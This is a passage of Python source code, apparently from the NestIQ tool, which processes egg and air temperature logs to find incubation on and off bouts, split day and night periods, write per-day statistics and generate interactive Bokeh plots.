datetime.datetime(*time_struct[0:6]) return dt def is_partial(df, first_index, last_index, expected_dur): """ Checks if given range of indices represents a complete daytime or nighttime period. Args: df (pd.DataFrame) first_index (int) last_index (int): expected_dur (int): expected duration in seconds """ # Allow 5 min (300 sec) of discrepency from expected durration block_dur_thresh = expected_dur - 300 start_time = df.loc[first_index, "date_time"] end_time = df.loc[last_index, "date_time"] block_dur = end_time - start_time if block_dur > datetime.timedelta(seconds=block_dur_thresh): return False return True def split_days(gui): """ Analyze dates of master DataFrame and parse row data into daytime and nighttime block objects. """ def is_daytime(date_time): """ Check if a given time falls within the daytime period defined by the user. Args: date_time (datetime.datetime) """ time = date_time.time() # When the start of daytime is earlier in the day than the start of nighttime if day_start < night_start: if time >= day_start and time < night_start: return True # When the start of nighttime is earlier in the day than the start of daytime elif night_start < day_start: if not (time >= night_start and time < day_start): return True return False def get_durs(day_start, night_start): """ Get expected durations in seconds for complete daytime and nightime periods. Args: day_start (datetime.time): user-defined start of daytime night_start (datetime.time) user-defined start of nighttime """ # Convert start times to datetime objects d = datetime.datetime(2020, 1, 1, day_start.hour, day_start.minute, day_start.second) n = datetime.datetime(2020, 1, 1, night_start.hour, night_start.minute, night_start.second) # When the start of daytime is earlier in the day than the start of nighttime if day_start < night_start: day_dur = (n - d).total_seconds() night_dur = 86400 - day_dur # Total seconds in day - daytime duration # When the start of nighttime is earlier in the day than the start of daytime elif night_start < day_start: night_dur = (d - n).total_seconds() day_dur = 86400 - day_dur # Total seconds in day - nighttime duration return day_dur, night_dur # Create time objects from entry box values day_start = convert_to_datetime(f"01/01/2020 {str(gui.day_start_E.get())}").time() night_start = convert_to_datetime(f"01/01/2020 {str(gui.night_start_E.get())}").time() # Get daytime and nighttime durations day_dur, night_dur = get_durs(day_start, night_start) # Create copy of master DataFrame to be appended to temp_df = gui.master_df.copy() temp_df["is_daytime"] = temp_df["date_time"].apply(is_daytime) # Detect day/night or night/day transitions int_states = temp_df.loc[:, "is_daytime"].replace([True, False], [1, 0]) state_changed = int_states.diff().apply(abs).astype(bool) state_changed.iloc[0] = False temp_df["transition_point"] = state_changed # Collect indices of day/night transition points filt = temp_df["transition_point"] == True transition_indices = temp_df[filt].index.to_list() transition_indices.append(len(temp_df)) # Construct day and night blocks from transition points days_list, nights_list = [], [] if is_daytime(temp_df.loc[0, "date_time"]): block_list = days_list block_dur_thresh = day_dur else: block_list = nights_list block_dur_thresh = night_dur cur_index = 0 for next_index in transition_indices: partial = is_partial(temp_df, cur_index, next_index - 1, block_dur_thresh) block_list.append(niq_classes.Block(gui, cur_index, (next_index - 1), partial)) block_dur_thresh = day_dur if block_dur_thresh == night_dur else night_dur block_list = days_list if block_list == nights_list else nights_list cur_index = next_index return days_list, nights_list def get_day_dur(day_start, night_start): """ Finds the duration of the daytime period specified by the user. Args: day_start (str): start of daytime period night_start (str): end of daytime period """ day = re.search(r"(\d+)(:)(\d+)", day_start) day_float = float(day.group(1)) + (float(day.group(3)) / 60) night = re.search(r"(\d+)(:)(\d+)", night_start) night_float = float(night.group(1)) + (float(night.group(3)) / 60) return (night_float - day_float) * 60 def smooth_series(radius, col): """ Generates "smoothed" copy of input data by applying a rolling mean of the requested radius. Args: radius (int): number of values to include in rolling mean (e.g. radius = 1 means average values i, i-1 and i+1) col (pd.Series): column data to be smoothed """ # Return original column if radius is less than 1 if radius <= 0: return col window = (radius * 2) + 1 return col.rolling(window, min_periods=1, center=True).mean() def get_verts_from_html(gui, in_file, alt=False): """ Creates vertex objects from vertices placed by the user in the provided HTML file. Args: gui (GUIClass) in_file (str): path to and name of HTML file containing user-provided vertex locations alt (Bool): dictates if vertices are extracted from the table or alternative variable in HTML file """ def get_data_points_from_html(gui, in_file): """ Extracts the corresponding data point for each point placed by the user in the HTML file. Args: gui (GUIClass) in_file (str): path to and name of HTML file containing user-provided vertex locations """ data_point_list = [] dp_col_num = gui.master_df.columns.get_loc("data_point") max_dp = gui.master_df.iloc[-1, dp_col_num] min_dp = gui.master_df.iloc[0, dp_col_num] with open(in_file, "r") as vertex_file: content = vertex_file.read() # Extract list of vertex data points try: # Try using Beautiful soup method soup = BeautifulSoup(content, "html.parser") # Extract html behind table table_widget = "bk-widget-box bk-layout-fixed" table_content = soup.find("div", class_=table_widget) # Extract leftmost column of data (data points) hits = table_content.find_all("div", class_="slick-cell l1 r1") dp_list = [hit.find("span", style="text-align: left;").text for hit in hits] # Get selected vertex if exists cell_re = re.compile(r"slick-cell l1 r1 selected\"><span style=\"text-align: left;\">(\d+)") selected = re.search(cell_re, content) if selected is not None: dp_list.append(selected.group(1)) except AttributeError: # Fall back to regex method try: dp_list = re.search(r'"data"\:\{"x":\[([^\]]*)', content).group(1).split(",") except AttributeError: dp_list = [] dp_list = [dp for dp in dp_list if is_number(dp)] for hit in dp_list: # Clean hits and append data_point = round(float(hit)) data_point = max(data_point, min_dp) data_point = min(data_point, max_dp) data_point_list.append(data_point) # Conversion to set removes redundant entries return sorted(set(data_point_list)) vertices = [] vertex_data_points = get_data_points_from_html(gui, in_file) # Make sure there is at least one data point detected in input plot if len(vertex_data_points) == 0: messagebox.showerror( "Input Plot Error", 'No vertices were detected in the provided plot.\n\n' + 'When saving plots, ensure the file type option is set to \"Webpage, Complete\" not \"Webpage, HTML only\".' ) return None # Flag -- make more pandas friendly for i in range(len(gui.master_df)): # Search for gap between index value and corresponding datapoint if int(gui.master_df.loc[i, "data_point"]) == int(vertex_data_points[0]): # Delta is discrepency between index and data point number delta = (vertex_data_points[0] - i) - 1 break # Search for gap between index value and corresponding datapoint filt = gui.master_df.loc[:, "data_point"] == vertex_data_points[0] first_dp_index = gui.master_df.loc[filt].index delta = int(gui.master_df.loc[first_dp_index, "data_point"] - first_dp_index) # Determine if first vertex is an off start or on start first_vert_temper = gui.master_df.loc[vertex_data_points[0] - delta, "egg_temper"] second_vert_temper = gui.master_df.loc[vertex_data_points[1] - delta, "egg_temper"] vert_type = "off" if first_vert_temper > second_vert_temper else "on" # Generate vertices for data_point in vertex_data_points: index = data_point - delta vertices.append(niq_classes.Vertex(index, gui.master_df.loc[index, "egg_temper"], vert_type)) vert_type = "on" if vert_type == "off" else "off" return vertices def extract_bouts_in_range(gui, total_bouts, first_index, last_index): """ Extracts vertices falling into a specified window of index values. Args: gui (GUIClass) total_bouts (list): every bout identified for the current input file first_index (int) last_index (int) """ bouts_in_range = [] left_limit, right_limit = 0, 0 if len(total_bouts) < 1 or last_index < total_bouts[0].first or first_index > total_bouts[-1].last: return bouts_in_range # Determine first bout in range for i in range(len(total_bouts)): if total_bouts[i].middle >= first_index: left_limit = i break # Determine last bout in range for i in range((len(total_bouts) - 1), -1, -1): if total_bouts[i].middle <= last_index: right_limit = i break bouts_in_range = total_bouts[left_limit : (right_limit + 1)] bouts_in_range.sort(key=lambda x: x.first) return bouts_in_range def get_date_blocks(gui): """ Creates Block objects for each date represented in the input file provided. Args: gui (GUIClass) """ # Get unique dates date_blocks = [] dates = gui.master_df["date_time"].apply(datetime.datetime.date).unique() # Get data points corrisponding to each date for date in dates: sub_df = gui.master_df[gui.master_df["date_time"].apply(datetime.datetime.date) == date] # 86400 = number of seconds in 24 hr partial = is_partial(gui.master_df, sub_df.index.min(), sub_df.index.max(), 86400) # Create Block object date_blocks.append(niq_classes.Block(gui, sub_df.index.min(), sub_df.index.max(), partial)) return date_blocks def write_stats(gui, date_blocks, master_block): """ Calculates and gathers several statistics and subsequently dumps them into the individual statistics file and/or the multi-input file statistics file depending on the user's requested output. Args: gui (GUIClass) days (BlockGroup): contains every day object and information about the group as a whole nights (BlockGroup): contains every night object and information about the group as a whole date_blocks (BlockGroup): contains every date Block which cary informationa bout data for each date master_block (block): block built from the entire input file """ if gui.get_stats_BV.get(): out_file = gui.stats_file_E.get() elif gui.multi_in_stats_BV.get(): out_file = gui.multi_in_stats_file_E.get() if not (gui.get_stats_BV.get() or gui.multi_in_stats_BV.get()): return # Used to indictate scope of certain statistics qualifier = " (D)," if gui.restrict_search_BV.get() else " (DN)," # Print input file name on top (remove directories) header = f"{gui.active_input_path.name}\n" if gui.day_num_BV.get(): header += "Day Number," if gui.date_BV.get(): header += "Date," if gui.off_count_BV.get(): header += "Off-bout Count" + qualifier if gui.off_dur_BV.get(): header += "Mean Off Duration" + qualifier if gui.off_dur_sd_BV.get(): header += "Off Dur StDev" + qualifier if gui.off_dec_BV.get(): header += "Mean Off Temp Drop" + qualifier if gui.off_dec_sd_BV.get(): header += "Off Drop StDev" + qualifier if gui.mean_off_temper_BV.get(): header += "Mean Off-Bout Temp" + qualifier if gui.off_time_sum_BV.get(): header += "Off-Bout Time Sum" + qualifier if gui.on_count_BV.get(): header += "On-bout Count" + qualifier if gui.on_dur_BV.get(): header += "Mean On Duration" + qualifier if gui.on_dur_sd_BV.get(): header += "On Dur StDev" + qualifier if gui.on_inc_BV.get(): header += "Mean On Temp Rise" + qualifier if gui.on_inc_sd_BV.get(): header += "On Rise StDev" + qualifier if gui.mean_on_temper_BV.get(): header += "Mean On-Bout Temp" + qualifier if gui.on_time_sum_BV.get(): header += "On-Bout Time Sum" + qualifier if gui.time_above_temper_BV.get(): header += "Time above " + gui.time_above_temper_E.get() + " (minutes)," if gui.time_below_temper_BV.get(): header += "Time below " + gui.time_below_temper_E.get() + " (minutes)," if gui.bouts_dropped_BV.get(): header += "Vertices Dropped" + qualifier if gui.mean_temper_d_BV.get(): header += "Mean Daytime Egg Temp," if gui.mean_temper_d_sd_BV.get(): header += "Day Egg Temp StDev," if gui.median_temper_d_BV.get(): header += "Median Daytime Egg Temp," if gui.min_temper_d_BV.get(): header += "Min Daytime Egg Temp," if gui.max_temper_d_BV.get(): header += "Max Daytime Egg Temp," if gui.mean_temper_n_BV.get(): header += "Mean Nighttime Egg Temp," if gui.mean_temper_n_sd_BV.get(): header += "Night Egg Temp StDev," if gui.median_temper_n_BV.get(): header += "Median Nighttime Egg Temp," if gui.min_temper_n_BV.get(): header += "Min Nighttime Egg Temp," if gui.max_temper_n_BV.get(): header += "Max Nighttime Egg Temp," if gui.mean_temper_dn_BV.get(): header += "Mean Egg Temp (DN)," if gui.mean_temper_dn_sd_BV.get(): header += "Egg Temp StDev (DN)," if gui.median_temper_dn_BV.get(): header += "Median Egg Temp (DN)," if gui.min_temper_dn_BV.get(): header += "Min Egg Temp (DN)," if gui.max_temper_dn_BV.get(): header += "Max Egg Temp (DN)," if gui.air_valid: if gui.mean_air_temper_BV.get(): header += "Mean Air Temp (DN)," if gui.mean_air_temper_sd_BV.get(): header += "Air Temp StDev (DN)," if gui.min_air_temper_BV.get(): header += "Min Air Temp (DN)," if gui.max_air_temper_BV.get(): header += "Max Air Temp (DN)," # ----------------------------------------------------------------------------------------------- day_rows = [] # Print individual day stats for i, block in enumerate(date_blocks): day_row = "" partial = " (Partial)" if block.partial_day else " (Full)" if gui.day_num_BV.get(): day_row += f"{i + 1}{partial}," if gui.date_BV.get(): day_row += f"{block.date}," if gui.off_count_BV.get(): day_row += f"{block.off_count}," if gui.off_dur_BV.get(): day_row += f"{block.mean_off_dur}," if gui.off_dur_sd_BV.get(): day_row += f"{block.off_dur_stdev}," if gui.off_dec_BV.get(): day_row += f"{block.mean_off_dec}," if gui.off_dec_sd_BV.get(): day_row += f"{block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): day_row += f"{block.mean_off_temper}," if gui.off_time_sum_BV.get(): day_row += f"{block.off_time_sum}," if gui.on_count_BV.get(): day_row += f"{block.on_count}," if gui.on_dur_BV.get(): day_row += f"{block.mean_on_dur}," if gui.on_dur_sd_BV.get(): day_row += f"{block.on_dur_stdev}," if gui.on_inc_BV.get(): day_row += f"{block.mean_on_inc}," if gui.on_inc_sd_BV.get(): day_row += f"{block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): day_row += f"{block.mean_on_temper}," if gui.on_time_sum_BV.get(): day_row += f"{block.on_time_sum}," if gui.time_above_temper_BV.get(): day_row += f"{block.time_above_temper}," if gui.time_below_temper_BV.get(): day_row += f"{block.time_below_temper}," if gui.bouts_dropped_BV.get(): day_row += f"{block.bouts_dropped}," if gui.mean_temper_d_BV.get(): day_row += f"{block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): day_row += f"{block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): day_row += f"{block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): day_row += f"{block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): day_row += f"{block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): day_row += f"{block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): day_row += f"{block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): day_row += f"{block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): day_row += f"{block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): day_row += f"{block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): day_row += f"{block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): day_row += f"{block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): day_row += f"{block.median_temper}," if gui.min_temper_dn_BV.get(): day_row += f"{block.min_egg_temper}," if gui.max_temper_dn_BV.get(): day_row += f"{block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): day_row += f"{block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): day_row += f"{block.air_temper_stdev}," if gui.min_air_temper_BV.get(): day_row += f"{block.min_air_temper}," if gui.max_air_temper_BV.get(): day_row += f"{block.max_air_temper}," day_rows.append(day_row) gui.multi_in_full_day_count += len(date_blocks) # ----------------------------------------------------------------------------------------------- # Output stats summary for entire input file summary_row = "" if gui.day_num_BV.get(): summary_row += f"--," if gui.date_BV.get(): summary_row += f"ALL DATA," if gui.off_count_BV.get(): summary_row += f"{master_block.off_count}," if gui.off_dur_BV.get(): summary_row += f"{master_block.mean_off_dur}," if gui.off_dur_sd_BV.get(): summary_row += f"{master_block.off_dur_stdev}," if gui.off_dec_BV.get(): summary_row += f"{master_block.mean_off_dec}," if gui.off_dec_sd_BV.get(): summary_row += f"{master_block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): summary_row += f"{master_block.mean_off_temper}," if gui.off_time_sum_BV.get(): summary_row += f"{master_block.off_time_sum}," if gui.on_count_BV.get(): summary_row += f"{master_block.on_count}," if gui.on_dur_BV.get(): summary_row += f"{master_block.mean_on_dur}," if gui.on_dur_sd_BV.get(): summary_row += f"{master_block.on_dur_stdev}," if gui.on_inc_BV.get(): summary_row += f"{master_block.mean_on_inc}," if gui.on_inc_sd_BV.get(): summary_row += f"{master_block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): summary_row += f"{master_block.mean_on_temper}," if gui.on_time_sum_BV.get(): summary_row += f"{master_block.on_time_sum}," if gui.time_above_temper_BV.get(): summary_row += f"{master_block.time_above_temper}," if gui.time_below_temper_BV.get(): summary_row += f"{master_block.time_below_temper}," if gui.bouts_dropped_BV.get(): summary_row += f"{master_block.bouts_dropped}," if gui.mean_temper_d_BV.get(): summary_row += f"{master_block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): summary_row += f"{master_block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): summary_row += f"{master_block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): summary_row += f"{master_block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): summary_row += f"{master_block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): summary_row += f"{master_block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): summary_row += f"{master_block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): summary_row += f"{master_block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): summary_row += f"{master_block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): summary_row += f"{master_block.median_temper}," if gui.min_temper_dn_BV.get(): summary_row += f"{master_block.min_egg_temper}," if gui.max_temper_dn_BV.get(): summary_row += f"{master_block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): summary_row += f"{master_block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): summary_row += f"{master_block.air_temper_stdev}," if gui.min_air_temper_BV.get(): summary_row += f"{master_block.min_air_temper}," if gui.max_air_temper_BV.get(): summary_row += f"{master_block.max_air_temper}," summary_row += "\n\n" # Determine what files to write day statistics to out_paths = [] if gui.get_stats_BV.get(): out_paths.append(Path(gui.stats_file_E.get())) if gui.multi_in_stats_BV.get(): out_paths.append(Path(gui.multi_in_stats_file_E.get())) # Write day statistics for path in out_paths: with open(path, "a") as out_file: print(header, end="\n", file=out_file) print("\n".join(day_rows), end="\n", file=out_file) print(summary_row, end="\n", file=out_file) if not gui.get_stats_BV.get(): return # ----------------------------------------------------------------------------------------------- # Report information on individual bouts indi_header = "Individual Bout Stats\n" indi_header += ( "Date,Bout Type,Start Time,End Time,Start Data Point,End Data Point,Duration (min),Egg Temp Change,Start Egg Temp,End Egg Temp,Mean Egg Temp, Egg Temp StDev," ) if gui.air_valid: indi_header += "Start Air Temp, End Air Temp, Mean Air Temp, Air Temp StDev" bouts = master_block.bouts bout_rows = [] cur_date = "" for bout in bouts: row = "" # Print date if it is the first row corresponding to this date this_date = gui.master_df.loc[bout.first, "date_time"].strftime(r"%m/%d/%Y") row += "," if this_date == cur_date else f"{this_date}," cur_date = this_date row += f"{bout.bout_type}," row += ( f"{gui.master_df.loc[bout.first, "date_time"].strftime(r"%H:%M")}," + f"{gui.master_df.loc[bout.last, "date_time"].strftime(r"%H:%M")}," + f"{gui.master_df.loc[bout.first, "data_point"]}," + f"{gui.master_df.loc[bout.last, "data_point"]}," + f"{bout.dur}," + f"{bout.temper_change}," + f"{gui.master_df.loc[bout.first, "egg_temper"]}," + f"{gui.master_df.loc[bout.last, "egg_temper"]}," + f"{bout.mean_egg_temper}," + f"{bout.egg_temper_stdev}," ) if gui.air_valid: row += ( f"{gui.master_df.loc[bout.first, "air_temper"]}," + f"{gui.master_df.loc[bout.last, "air_temper"]}," + f"{bout.mean_air_temper}," + f"{bout.air_temper_stdev}" ) bout_rows.append(row) with open(Path(gui.stats_file_E.get()), "a") as out_file: print(indi_header, end="\n", file=out_file) print("\n".join(bout_rows), file=out_file) def generate_plot(gui, days_list, edit_mode=False, out_path=None): """ Uses the Bokeh module to generate an interactive plot for the current input file. Args: gui (GUIClass): days_list (list): used to place vertical day delimiting line edit_mode (bool): generates a modified plot that allows for vertex manipulation """ def get_plot_dims(): """ Determine plot dimientions based on either user provided values or monitor dimension detection. """ if not gui.manual_plot_dims.get(): try: mon_dims = (gui.root.winfo_screenwidth(), gui.root.winfo_screenheight()) mon_x = mon_dims[0] mon_y = mon_dims[1] plot_width = int(mon_x) - 100 plot_height = int(mon_y) - 200 except: print("Defaulting to manual plot dimensions") plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) else: plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) return plot_width, plot_height def get_plot_axes(): """ Determine proper constrains of y axis """ y_min = float("inf") y_max = float("-inf") if gui.plot_egg_BV.get(): y_min = min(y_min, df["egg_temper"].min()) y_max = max(y_max, df["egg_temper"].max()) if gui.plot_air_BV.get() and gui.air_valid: y_min = min(y_min, df["air_temper"].min()) y_max = max(y_max, df["air_temper"].max()) if gui.plot_adj_BV.get(): y_min = min(y_min, df["smoothed_adj_temper"].min()) y_max = max(y_max, df["smoothed_adj_temper"].max()) y_min -= 2 y_max += 2 return y_min, y_max def generate_table(): """ Generate table with vertex information """ table_title = "Egg Temperature" verts = get_verts_from_master_df(df) x_list, y_list = [], [] # Add vertices to table (allow egg_tempers or adj_tempers, not both) if gui.plot_egg_BV.get(): x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "egg_temper"] for vert in verts] elif gui.plot_adj_BV.get(): table_title = "Adjusted Temperature" x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "smoothed_adj_temper"] for vert in verts] data = {"x": x_list, "y": y_list} src = ColumnDataSource(data) columns = [TableColumn(field="x", title="Transition Data Point"), TableColumn(field="y", title=table_title)] # FLAG shoud make height dynamic data_table = DataTable(source=src, columns=columns, width=500, height=100000) return data_table def append_input_info(path): # Get number of seconds between each data point first = df["date_time"].iloc[0] last = df["date_time"].iloc[-1] delta_sec = (last - first).total_seconds() interval = round(delta_sec / len(df)) # Create dictionary summarizing critical input file information input_dict = { "first_dp": int(df["data_point"].iloc[0]), "first_dt": df["date_time"].iloc[0].strftime(r"%m/%d/%Y %H:%M:%S"), "dt_interval": interval, "egg_temper": df["egg_temper"].tolist(), "air_temper": df["air_temper"].tolist() } # Append input file information to the HTML file with open(path, "a") as file: file.write("\n\n<!--NestIQ input data\n") file.write(json.dumps(input_dict)) file.write("\n-->\n") df = gui.master_df master_array = df_to_array(df) # Clears previous plots from memory reset_output() # Set output file out_path = out_path if out_path is not None else Path(gui.plot_file_E.get()) output_file(out_path) plot_width, plot_height = get_plot_dims() TOOLTIPS = [("Data Point", "$x{int}"), ("Temperature", "$y")] hover = HoverTool(tooltips=TOOLTIPS) # Set plot title plot_name = Path(gui.input_file_E.get()).stem if gui.plot_title_E.get() != "": plot_name = gui.plot_title_E.get() # Set plot axes y_min, y_max = get_plot_axes() dp_col_num = df.columns.get_loc("data_point") # Create core plot plot = figure( tools=[hover, "box_select, box_zoom, wheel_zoom, pan, reset, save"], x_range=[df.iloc[0, dp_col_num], df.iloc[-1, dp_col_num]], y_range=[y_min, y_max], title=plot_name, x_axis_label="Data Point", y_axis_label="Temperature (C)", plot_width=plot_width, plot_height=plot_height, ) # Add vertical lines delimiting days if gui.show_day_markers_BV.get(): for day in days_list: vertical_line = Span( location=int(df.loc[day.first, "data_point"]), dimension="height", line_color=gui.day_marker_color.get(), line_width=float(gui.day_marker_width_E.get()), line_alpha=0.4, ) plot.renderers.extend([vertical_line]) plot.grid.visible = True if gui.show_grid_BV.get() else False # Define data point colors if edit_mode: # Set static color color_ = "gray" alpha_ = 1 else: # Set color based on bout state bout_state_col_num = 2 color_key = {0: gui.off_point_color.get(), 1: gui.on_point_color.get(), 2: "lightgray"} color_ = np.vectorize(color_key.get)(master_array[:, bout_state_col_num]) alpha_key = {0: 1, 1: 1, 2: 1} alpha_ = np.vectorize(alpha_key.get)(master_array[:, bout_state_col_num]) radius = int(gui.smoothing_radius_E.get()) # Get array of air temperatures and smooth if requested if gui.air_valid and gui.plot_air_BV.get(): air_array = df["air_temper"] if gui.smooth_status_IV.get(): air_array = smooth_series(radius, air_array) # Plot air temperatures plot.line( df["data_point"], air_array, line_width=float(gui.air_line_width_E.get()), color=gui.air_line_color.get(), line_alpha=1, legend="Air temperature", ) # Get array of egg temperatures and smooth if requested if gui.plot_egg_BV.get(): egg_array = df["egg_temper"] if gui.smooth_status_IV.get(): egg_array = smooth_series(radius, egg_array) # Update legend if not edit_mode: legend_ = "On-bout (egg)" if gui.plot_adj_BV.get() else "On-bout" plot.circle(df.loc[0, "data_point"], egg_array[0], size=float(gui.on_point_size_E.get()), color=gui.on_point_color.get(), legend=legend_) legend_ = "Off-bout (egg)" if gui.plot_adj_BV.get() else "Off-bout" plot.circle(df.loc[0, "data_point"], egg_array[0], size=float(gui.on_point_size_E.get()), color=gui.off_point_color.get(), legend=legend_) # Plot egg temperatures if float(gui.bout_line_width_E.get()) > 0: plot.line(df["data_point"], egg_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get()) plot.circle(df["data_point"], egg_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_) # Get array of adjusted (egg - air) temperatures and smooth if requested if gui.plot_adj_BV.get(): adj_array = df["smoothed_adj_temper"] # Plot line if float(gui.bout_line_width_E.get()) > 0: plot.line(df["data_point"], adj_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get()) # Plot adjusted temperatures as triangles if egg temperatures are also being plotted plot_shape = plot.triangle if gui.plot_egg_BV.get() else plot.circle # Add legend values if edit_mode: plot.circle(df.loc[0, "data_point"], adj_array, size=float(gui.on_point_size_E.get()), color="gray", legend="Temperature reading") else: plot_shape( df.loc[0, "data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=gui.on_point_color.get(), legend="On-bout (egg - air)", ) plot_shape( df.loc[0, "data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=gui.off_point_color.get(), legend="Off-bout (egg - air)", ) # Add data points plot_shape(df["data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_) data_table = generate_table() if edit_mode: # Plot vertices as large circles in select mode renderer = plot.circle("x", "y", size=float(gui.on_point_size_E.get()), color="red", fill_alpha=0.8, legend="Incubation State Change", source=data_table.source) draw_tool = PointDrawTool(renderers=[renderer], empty_value=1) plot.add_tools(draw_tool) plot.toolbar.active_drag = draw_tool # Get formatting settings from GUI plot.title.text_font_size = gui.title_font_size_E.get() + "pt" plot.axis.axis_label_text_font_size = gui.axis_title_font_size_E.get() + "pt" plot.axis.major_label_text_font_size = gui.axis_label_font_size_E.get() + "pt" plot.axis.major_tick_line_width = int(gui.axis_tick_size_E.get()) plot.axis.minor_tick_line_width = int(gui.axis_tick_size_E.get()) plot.axis.major_tick_out = int(gui.axis_tick_size_E.get()) plot.axis.minor_tick_out = int(gui.axis_tick_size_E.get()) plot.legend.label_text_font_size = gui.legend_font_size_E.get() + "pt" plot.legend.click_policy = "hide" plot.legend.location = gui.legend_loc.get() plot.background_fill_color = None plot.border_fill_color = None show(column(plot, widgetbox(data_table))) append_input_info(out_path) def get_verts_from_master_df(master_df): """ Extracts vertex objects based on state transitions in master_df. Args: master_df (pd.DataFrame) """ if "bout_state" not in master_df.columns: return [] # Convert bout_states to integers temp_df = master_df.copy() int_states = temp_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2]) # Create Boolean Series that stores if the state has changed state_changed = int_states.diff().astype(bool) state_changed.iloc[0] = False # Extract indices of rows where the state changes vert_indices = master_df[state_changed].index.tolist() vertices = [] for index in vert_indices: row = master_df.loc[index] vertices.append(niq_classes.Vertex(index, row["egg_temper"], row["bout_state"])) # Add vertices at begining and end of data set last = len(master_df) - 1 vertices.append(niq_classes.Vertex(0, master_df.loc[0, "egg_temper"], master_df.loc[0, "bout_state"])) vertices.append(niq_classes.Vertex(last, master_df.loc[last, "egg_temper"], master_df.loc[last, "bout_state"])) vertices.sort(key=lambda x: x.index) return vertices def replace_entry(entry, new_value): entry.delete(0, "end") entry.insert(0, new_value) def filter_by_dur(gui): """ Purges the master df of state clusters failing to meet a given duration threshold. Args: gui (GUI) """ dur_thresh = int(gui.dur_thresh_E.get()) df = gui.master_df bouts_dropped_locs = set() for bout in gui.master_block.bouts: dur = bout.last - bout.first # If duration threshold not met if dur < dur_thresh: # Set bout_state for corrisponding rows to that of adjacent row new_state = "on" if bout.bout_type == "off" else "off" df.loc[bout.first:bout.last, "bout_state"] = new_state bouts_dropped_locs.add(bout.middle) # Delete bout gui.master_block.bouts.remove(bout) return df, bouts_dropped_locs def set_unique_path(entry, path, ext): """ Incriments an identificaiton number until a unique file name is found then fills entry box with unique path. Args: entry (tk.Entry): entry box being updated path (pathlib.Path): path to check for uniqueness ext (str): file extension """ counter = 0 ori_stem = path.stem file_path = Path(path).with_suffix(ext) # Adds trailing number until unique path is found while file_path.exists(): counter += 1 file_path = (file_path.parent / (ori_stem + "_" + str(counter).zfill(3))).with_suffix(ext) replace_entry(entry, file_path) def remove_curly(*entries, string=False): """ Removes curly braces from entry box contents. These are often added for paths containing spaces. Args: entries (tk.Entry) """ if string: return entries[0].lstrip("{").rstrip("}") for entry in entries: replace_entry(entry, entry.get().lstrip("{").rstrip("}")) def df_to_array(df): """ Convert master DataFrame to numpy array. Columns: 0 - data point 1 - delta temper (emision), change in smoothed_egg_temper or smoothed_adj_temper depending on user setting 2 - bout state """ # If array is passed, just return if type(df) == np.ndarray: return df # Grab appropriate columns if "bout_state" in df.columns: mod_df = df.loc[:, ["data_point", "delta_temper", "bout_state"]].copy() # Convert bout stats to integers mod_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2], inplace=True) else: mod_df = df[["data_point", "delta_temper"]] return mod_df.to_numpy() def get_bouts_from_verts(gui, verts): """ Extracts bout objects based on vertex locations. Args: gui (GUIClass) """ bouts = [] # Return if insufficient number of vertices supplied if verts is None or len(verts) < 2: return bouts # Create bout objects cur_vert = verts[0] for next_vert in verts[1:]: # Skip if cur_vert is start of nighttime period if cur_vert.vert_type != "None" and next_vert.index > cur_vert.index: bouts.append(niq_classes.Bout(gui, cur_vert.index, next_vert.index - 1, cur_vert.vert_type)) cur_vert = next_vert bouts.sort(key=lambda x: x.first) return bouts def is_number(string): try: float(string) except ValueError: return False return True
